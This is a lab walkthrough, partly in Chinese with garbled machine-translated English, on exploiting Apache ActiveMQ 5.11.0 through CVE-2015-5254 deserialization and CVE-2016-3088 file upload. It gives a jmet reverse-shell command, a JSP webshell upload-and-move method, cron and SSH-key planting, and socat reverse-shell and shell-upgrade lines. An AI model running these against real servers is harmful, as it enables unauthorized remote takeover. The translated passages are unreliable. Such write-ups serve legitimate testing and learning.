About 0x00
Apache is a US Apache (Apache) Software Foundation developed a set of open source messaging middleware, it supports Java Message Service, clusters, Spring Framework and so on. ActiveMQ
0x01 environment to build
As used herein, apachemq version: 5.11.0
Download: http://activemq.apache.org/activemq-5110-release.html
unpacked
./bin/activemq start 启动 netstat -ntlp|grep 8161 查看是否启动成功(8161为默认端口)
0x02 deserialization vulnerability (CVE-2015-5254)
Apache ActiveMQ before the 5.13.0 version 5.x security vulnerability, the vulnerability can be derived from the program does not limit the sequence of the proxy class. A remote attacker can make use of a special sequence of Java Message Service(JMS)ObjectMessage
objects using this vulnerability to execute arbitrary code.
8161 is the default ActiveMQ web管理端口
, 61616 default ActiveMQ 消息队列端口
.
Use jmet
vulnerability exploit, jmet Download:
https://github.com/matthiaskaiser/jmet/releases
jmet construction event event
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "payload" -Yp ROME 192.168.124.128 61616
Error:
In jmet create a directory external
folder to
Configuration payload sent to the rebound of the shell deserialized message queue
News:
When you click to trigger the message:
0x03 write any file Vulnerability (CVE-2016-3088)
该漏洞影响Apache ActiveMQ 5.x ~ 5.14.0,但在5.12.x~5.13.x
版本中,已经默认关闭了fileserver
这个应用(可以在conf/jetty.xml中开启之)。在5.14.0
版本以后,彻底删除了fileserver应用。
ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT
方法上传文件到指定目录。FileServer是储存文件的接口。FileServer支持写入文件(不解析jsp),但是支持移动文件(Move
)我们可以将jsp的文件PUT到FileServer下然后再通过Move指令移动到可执行目录下访问。
使用PUT
方法进行上传测试:
成功访问说明文件已经put
上去,我们可以直接put jsp小马/大马 移动到可解析目录就可以getshell了。webapps/api/
或者 webapps/admin/
下都可以解析jsp。但是要移动文件到可解析目录,需要获取绝对路径
这里介绍两种获取绝对路径的方法:
1.访问http://ip:8161/admin/test/systemProperties.jsp
2.构造错误上传路径可爆出绝对路径(此版本未成功,其他版本可自行测试)
上传Webshell:
根据获取的绝对路径,移动到Web目录下的/root/apache-activemq-5.11.0/webapps/admin/test.jsp
访问shell(需登录,默认密码 admin
/admin
)
同理也可写入ssh key进行公钥登录
写入corntab
反弹shell(需要activemq 以root权限运行)
移动到/etc/cron.d/root
监听接收shell
crontab定时任务
文件写入到 /etc/crontab.d/
中
minute hour day month week command 顺序:分 时 日 月 周 * * * * * command 代表每分钟执行一次
0x04 TIPS
Usually we test a rebound shell, the operation is very simple, sometimes mistype a command means lost shell, no tab, no vim, and so very friendly!
Several methods of obtaining a perfect shell share the following:
1. Using the python pty
module, the terminal may generate a pseudo
when we receive bounce back shell execution
python -c 'import pty; pty.spawn("/bin/bash")'
2. Use socat
Socat like nc as a powerful tool, tcp connections, establish a complete tty, if the victim server is installed socat
, you can use it to bounce shell. If not installed with the following command:
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat;chmod +x socat
Listen:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:4444
3. Add the magic of the netcat
first first step we get a shell in accordance with the first method python pty way
Followed by the key combination " Ctrl-Z
," go back into the shell.
Check the current terminal and styy information:
The information needed for the term type ( xterm
) and the current stty size (rows 33; columns 191)
causes the shell to continue running in the background, now the current STTY
setting of the original type, and tell it to echo typed characters
With " fg
" The front shell referred to by " reset
" reset terminal
Finally, the above information is provided to collect shell terminal type and stty
size.
Reference link : https: //blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys